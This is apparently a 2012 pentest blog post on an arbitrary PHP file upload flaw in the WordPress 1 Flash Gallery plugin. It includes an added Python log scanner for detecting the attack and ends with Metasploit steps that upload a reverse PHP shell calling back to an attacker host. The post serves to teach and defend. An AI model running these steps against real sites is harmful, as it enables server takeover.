Friday 1 June 2012

WordPress 1 Flash Gallery Plugin Arbitrary File Upload Vulnerability




Secunia Advisory SA45930
Release Date 2011-09-08
The vulnerability is caused due to the wp-content/plugins/1-flash-gallery/upload.php script (when "action" is set to "uploadify" and "fileext" is set to e.g. "php") improperly verifying uploaded files. This can be exploited to execute arbitrary PHP code by uploading a PHP file. The vulnerability is confirmed in version 1.5.6. Prior versions may also be affected.
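
For defenders, the request pattern the advisory describes can be searched for in web server access logs. The following is an added example, not part of the original post or the plugin: it assumes Apache/nginx "combined" log lines, that "action" and "fileext" appear in the logged query string, and an image-only allow-list of my own choosing; the log lines are constructed samples.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Script path named in the advisory
VULN_PATH = "/wp-content/plugins/1-flash-gallery/upload.php"
# Assumption: the only extensions a gallery upload legitimately needs
ALLOWED_EXT = {"jpg", "jpeg", "png", "gif"}

# Apache/nginx "combined" format: ip, timestamp, request line, status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

# Constructed sample lines (documentation addresses, not real traffic)
SAMPLE_LOG = [
    '198.51.100.7 - - [08/Sep/2011:10:00:01 +0000] "POST /wordpress/wp-content/plugins/1-flash-gallery/upload.php?action=uploadify&fileext=php HTTP/1.1" 200 17 "-" "-"',
    '198.51.100.9 - - [08/Sep/2011:10:02:11 +0000] "POST /wp-content/plugins/1-flash-gallery/upload.php?action=uploadify&fileext=*.jpg;*.png HTTP/1.1" 200 17 "-" "-"',
    '198.51.100.9 - - [08/Sep/2011:10:03:00 +0000] "GET /wordpress/index.php HTTP/1.1" 200 5120 "-" "-"',
]

def classify(line):
    """Return (severity, ip, reason) for one log line, or None if unrelated."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m["target"])
    path = re.sub(r"/+", "/", unquote(parts.path)).lower()  # normalise //, %2f, case
    if not path.endswith(VULN_PATH):
        return None
    qs = {k.lower(): [v.lower() for v in vs] for k, vs in parse_qs(parts.query).items()}
    if "uploadify" not in qs.get("action", []):
        return ("info", m["ip"], "request to upload.php without action=uploadify")
    # fileext may be a pattern list such as "*.jpg;*.png": split it into bare extensions
    exts = [e for v in qs.get("fileext", []) for e in re.split(r"[^a-z0-9]+", v) if e]
    bad = sorted({e for e in exts if e not in ALLOWED_EXT})
    if bad and m["method"] == "POST":
        sev = "high" if m["status"].startswith("2") else "medium"
        return (sev, m["ip"], "uploadify with non-image fileext: " + ",".join(bad))
    return ("low", m["ip"], "uploadify request")

def scan(lines):
    """Return only the medium/high findings worth investigating."""
    return [f for f in map(classify, lines) if f and f[0] in ("medium", "high")]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A "high" finding means the server answered 2xx, so the plugin's upload directory should be checked for unexpected .php files and the plugin updated or removed.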

Download the exploit from http://www.exploit-db.com/exploits/17801/
Copy to /pentest/exploits/framework3/modules/exploits/multi/http

Fix the payload /pentest/exploits/framework3/modules/payloads/singles/php/reverse_php.rb as I explained in my video.

msfconsole
use multi/http/flash_galery_wordpress
set RHOST 172.16.1.70
set URI /wordpress
set PAYLOAD php/reverse_php_airwolf
set LHOST 172.16.1.79
exploit

And that's it, thank you guys for watching it.